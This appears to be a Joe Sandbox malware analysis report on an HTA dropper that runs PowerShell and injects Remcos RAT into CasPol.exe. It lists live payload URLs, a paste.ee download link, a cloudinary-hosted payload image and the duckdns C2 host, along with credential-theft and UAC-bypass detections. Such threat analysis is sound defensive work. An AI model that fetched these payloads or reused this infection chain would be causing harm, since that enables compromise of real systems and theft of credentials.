                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00404915 GetLocalTime,CreateEventA,CreateThread,12_2_00404915
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041A7A2 GetComputerNameExW,GetUserNameW,12_2_0041A7A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044800F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db12_2_0040B335

                      Remote Access Functionality

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-H22KKMJump to behavior
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.powershell.exe.6724510.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.4555889759.0000000001468000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5924, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 1776, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: cmd.exe12_2_00405042
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information111
                      Scripting
                      Valid Accounts1
                      Native API
                      111
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      OS Credential Dumping
                      2
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution
                      1
                      DLL Side-Loading
                      1
                      Bypass User Account Control
                      2
                      Obfuscated Files or Information
                      111
                      Input Capture
                      1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      12
                      Ingress Tool Transfer
                      Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts13
                      Command and Scripting Interpreter
                      1
                      Windows Service
                      1
                      Access Token Manipulation
                      1
                      DLL Side-Loading
                      2
                      Credentials In Files
                      1
                      System Service Discovery
                      SMB/Windows Admin Shares111
                      Input Capture
                      21
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      Service Execution
                      Login Hook1
                      Windows Service
                      1
                      Bypass User Account Control
                      NTDS3
                      File and Directory Discovery
                      Distributed Component Object Model3
                      Clipboard Data
                      1
                      Remote Access Software
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts3
                      PowerShell
                      Network Logon Script221
                      Process Injection
                      1
                      Masquerading
                      LSA Secrets34
                      System Information Discovery
                      SSHKeylogging2
                      Non-Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials21
                      Security Software Discovery
                      VNCGUI Input Capture213
                      Application Layer Protocol
                      Data Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Access Token Manipulation
                      DCSync21
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job221
                      Process Injection
                      Proc Filesystem2
                      Process Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery
                      Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576455 Sample: seethebestmethodwithgreatne... Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 50 kiolokgangan.duckdns.org 2->50 52 paste.ee 2->52 54 2 other IPs or domains 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 72 17 other signatures 2->72 11 mshta.exe 1 2->11         started        signatures3 68 Uses dynamic DNS services 50->68 70 Connects to a pastebin service (likely for C&C) 52->70 process4 signatures5 92 Suspicious command line found 11->92 94 PowerShell case anomaly found 11->94 14 cmd.exe 1 11->14         started        process6 signatures7 96 Detected Cobalt Strike Beacon 14->96 98 Suspicious powershell command line found 14->98 100 Wscript starts Powershell (via cmd or directly) 14->100 102 PowerShell case anomaly found 14->102 17 powershell.exe 42 14->17         started        22 conhost.exe 14->22         started        process8 dnsIp9 48 74.208.80.248, 49707, 80 ONEANDONE-ASBrauerstrasse48DE United States 17->48 42 seewhatiamdoingfor...sthingsgivenmeb.vbS, Unicode 17->42 dropped 44 C:\Users\user\AppData\...\bxb5o0my.cmdline, Unicode 17->44 dropped 74 Loading BitLocker PowerShell Module 17->74 24 wscript.exe 1 17->24         started        27 csc.exe 3 17->27         started        file10 signatures11 process12 file13 84 Detected Cobalt Strike Beacon 24->84 86 Suspicious powershell command line found 24->86 88 Wscript starts Powershell (via cmd or directly) 24->88 90 2 other signatures 24->90 30 powershell.exe 15 16 24->30         started        46 C:\Users\user\AppData\Local\...\bxb5o0my.dll, PE32 27->46 dropped 34 cvtres.exe 1 27->34         started        signatures14 process15 dnsIp16 58 cloudinary.map.fastly.net 151.101.1.137, 443, 49715 FASTLYUS United States 30->58 60 paste.ee 104.21.84.67, 443, 49770 CLOUDFLARENETUS United States 30->60 104 Writes to foreign memory regions 30->104 106 Injects a PE file into a foreign processes 30->106 36 CasPol.exe 3 30->36         started        40 conhost.exe 30->40         started        signatures17 process18 dnsIp19 56 kiolokgangan.duckdns.org 192.169.69.26, 2430, 49781, 49808 WOWUS United States 36->56 76 Contains functionality to bypass UAC (CMSTPLUA) 36->76 78 Detected Remcos RAT 36->78 80 Contains functionalty to change the wallpaper 36->80 82 4 other signatures 36->82 signatures20

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta28%VirustotalBrowse
                      seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta13%ReversingLabsScript-JS.Phishing.Generic
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://analytics.paste.ee0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFo0%Avira URL Cloudsafe
                      https://www.google.com;0%Avira URL Cloudsafe
                      kiolokgangan.duckdns.org100%Avira URL Cloudmalware
                      https://analytics.paste.ee;0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhati0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFity0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFM0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIF0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtM0%Avira URL Cloudsafe
                      https://cdnjs.cloudflare.com;0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFY0%Avira URL Cloudsafe
                      https://akaStorageSetting.cdxml0%Avira URL Cloudsafe
                      http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFc0%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      paste.ee
                      104.21.84.67
                      truefalse
                        high
                        cloudinary.map.fastly.net
                        151.101.1.137
                        truefalse
                          high
                          kiolokgangan.duckdns.org
                          192.169.69.26
                          truetrue
                            unknown
                            res.cloudinary.com
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              kiolokgangan.duckdns.orgtrue
                              • Avira URL Cloud: malware
                              unknown
                              http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtrue
                              • Avira URL Cloud: safe
                              unknown
                              https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgfalse
                                high
                                https://paste.ee/r/3tNKn/0false
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFtMpowershell.exe, 00000003.00000002.2233063416.000000000708D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFMpowershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.microsoftpowershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2485897465.0000000002BE8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              https://go.micropowershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://contoso.com/Licensepowershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://www.google.com;powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://contoso.com/Iconpowershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://analytics.paste.eepowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://go.microspowershell.exe, 00000003.00000002.2229203641.0000000004E5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://geoplugin.net/json.gpCasPol.exefalse
                                                          high
                                                          https://www.google.compowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://res.cloudinary.compowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFopowershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://geoplugin.net/json.gp/Cpowershell.exe, 00000008.00000002.2487827556.0000000006683000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                high
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgtpowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFitypowershell.exe, 00000003.00000002.2235184005.0000000007FDA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2229203641.00000000049C7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://contoso.com/powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2231208292.00000000058D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.000000000581A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://analytics.paste.ee;powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://74.208.80.248/43/seewhatipowershell.exe, 00000003.00000002.2229203641.0000000004C97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFcpowershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://cdnjs.cloudflare.compowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://cdnjs.cloudflare.com;powershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2229203641.0000000004871000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2487827556.00000000047B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://secure.gravatar.compowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://themes.googleusercontent.compowershell.exe, 00000008.00000002.2487827556.0000000004907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://74.208.80.248/43/seewhatiamdoingforyouwithgreatnessthingsgivenmeback.tIFYpowershell.exe, 00000003.00000002.2233063416.0000000007145000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://akaStorageSetting.cdxmlpowershell.exe, 00000003.00000002.2233063416.00000000070B2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://github.com/dahall/taskschedulerpowershell.exe, 00000008.00000002.2487827556.000000000635E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs
                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    151.101.1.137
                                                                                    cloudinary.map.fastly.netUnited States
                                                                                    54113FASTLYUSfalse
                                                                                    104.21.84.67
                                                                                    paste.eeUnited States
                                                                                    13335CLOUDFLARENETUSfalse
                                                                                    192.169.69.26
                                                                                    kiolokgangan.duckdns.orgUnited States
                                                                                    23033WOWUStrue
                                                                                    74.208.80.248
                                                                                    unknownUnited States
                                                                                    8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1576455
                                                                                    Start date and time:2024-12-17 07:21:07 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 8m 57s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:13
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:0
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:seethebestmethodwithgreatnessgoodnewsgreatdaygivenme.hta
                                                                                    Detection:MAL
                                                                                    Classification:mal100.rans.phis.troj.spyw.expl.evad.winHTA@18/16@5/4
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 99%
                                                                                    • Number of executed functions: 59
                                                                                    • Number of non-executed functions: 184
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .hta
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target mshta.exe, PID 3608 because there are no executed function
                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    TimeTypeDescription
                                                                                    01:21:58API Interceptor121x Sleep call for process: powershell.exe modified
                                                                                    01:23:10API Interceptor3736783x Sleep call for process: CasPol.exe modified
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    151.101.1.137createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                      greatattitudewithnicefeatruewithgreatnicecreamypurplethingsgood.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                        goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                          creamkissingthingswithcreambananapackagecreamy.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                            Euro confirmation Sp.xlsGet hashmaliciousUnknownBrowse
                                                                                              stage2.ps1Get hashmaliciousPureLog Stealer, RevengeRAT, zgRATBrowse
                                                                                                nicegirlforyou.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                  Invoice A037.xlsGet hashmaliciousUnknownBrowse
                                                                                                    Orden_de_Compra_Nmero_6782929219.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                                                      Aktarma,pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                        104.21.84.67Order_DEC2024.wsfGet hashmaliciousRemcosBrowse
                                                                                                        • paste.ee/d/GXRLA
                                                                                                        nr101612_Order.wsfGet hashmaliciousRemcosBrowse
                                                                                                        • paste.ee/d/81FCf
                                                                                                        Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                        • paste.ee/d/MQJcS
                                                                                                        Chitanta bancara - #113243.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                        • paste.ee/d/u4bvR
                                                                                                        rdevuelto_Pagos.wsfGet hashmaliciousAgentTeslaBrowse
                                                                                                        • paste.ee/d/SDfNF
                                                                                                        Product list 0980DF098A7.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/enGXm
                                                                                                        Payment_advice.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/wXm0Y
                                                                                                        SHREE GANESH BOOK SERVICES-347274.xlsGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/eA3FM
                                                                                                        dereac.vbeGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/JZHbW
                                                                                                        P018400.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • paste.ee/d/kmRFs
                                                                                                        192.169.69.26f5ATZ1i5CU.exeGet hashmaliciousRedLine, XWormBrowse
                                                                                                        • duclog23.duckdns.org:37552/
                                                                                                        SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                                                                        • yuya0415.duckdns.org:1928/Vre
                                                                                                        confirmaci#U00f3n y correcci#U00f3n de la direcci#U00f3n de entrega.vbsGet hashmaliciousUnknownBrowse
                                                                                                        • servidorarquivos.duckdns.org/e/e
                                                                                                        oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                                                        • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                                                        oKtkBYZMWl.exeGet hashmaliciousUnknownBrowse
                                                                                                        • csacsadhe.duckdns.org/byfronbypass.html/css/mss/Arzgohi.mp3
                                                                                                        http://yvtplhuqem.duckdns.org/ja/Get hashmaliciousUnknownBrowse
                                                                                                        • yvtplhuqem.duckdns.org/ja/
                                                                                                        http://fqqqffcydg.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                                                        • fqqqffcydg.duckdns.org/en/
                                                                                                        http://yugdzvsqnf.duckdns.org/en/Get hashmaliciousUnknownBrowse
                                                                                                        • yugdzvsqnf.duckdns.org/en/
                                                                                                        &nuevo_pedido#..vbsGet hashmaliciousUnknownBrowse
                                                                                                        • servidorarquivos.duckdns.org/e/e
                                                                                                        transferencia_Hsbc.xlsxGet hashmaliciousUnknownBrowse
                                                                                                        • servidorarquivos.duckdns.org/e/e
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        cloudinary.map.fastly.netcreatedbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                                                                        • 151.101.1.137
                                                                                                        PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                        • 151.101.193.137
